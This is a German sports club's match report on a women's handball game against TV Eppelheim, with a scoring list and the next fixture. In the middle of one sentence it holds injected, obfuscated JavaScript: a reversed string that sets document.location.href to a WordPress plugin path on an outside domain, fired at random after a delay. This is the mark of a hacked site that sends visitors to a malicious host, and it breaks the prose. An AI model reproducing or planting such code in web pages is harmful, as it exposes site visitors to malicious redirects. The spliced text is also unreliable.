Am Sonntag, den 25.09.16 trafen die Damen des TVN auf die Gegnerinnen vom TV Eppelheim.
Das Spiel begann gut und ausgeglichen. Ab der 20. Spielminute (6:7) ließ die Konzentration der Gastgeberinnen stark nach. Nicht gefangene Bälle im Angriff wurden sofort von den Eppelheimerinnen genutzt und mit Tempogegenstößen in Tore umgewandelt. Sina Mulawa wurde von Ihrer Mannschaft regelrecht im Stich gelassen. So ging es mit einem 8:14 in die Halbzeitpause. Zu allem Übel wurde Mona durch eine toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}total unfaire Aktion am Hals getroffen, dass sie fortan der Mannschaft nicht mehr helfen konnte.
Auch in der zweite Halbzeit konnte man nicht zum Spiel zurückfinden. In der Abwehr wurde nicht gut ausgeholfen, sodass es einige 2- Minuten Strafen und 7 Meter für die Eppelheimerinnen gab.
Schlussendlich wurde das Spiel mit 19:31 verloren.
Nun heißt es Kopf hoch und in den nächsten zwei Trainingseinheiten konzentriert arbeiten.
Es spielten:
Sina Mulawa (Tor), Jessica Lehr, Lara Capriglione (1/1), Luisa Bucher (5), Kathrin (5/4), Stephanie Thien (3), Laura Maier (1), Katja Ebert, Cora Rückert (2/2), Sandra Pabst (1), Mona Klingenberg, Elaine Weitzel, Michelle Weber (1)
Neues Spiel , neues Glück, erwartet die Damen des TVN hoffentlich nächste Woche am 01.10.16 auswärts beim
TV Sinsheim. Anpfiff ist um 17:10 Uhr. Die Mannschaft würde sich auf zahlreiche Unterstützung freuen.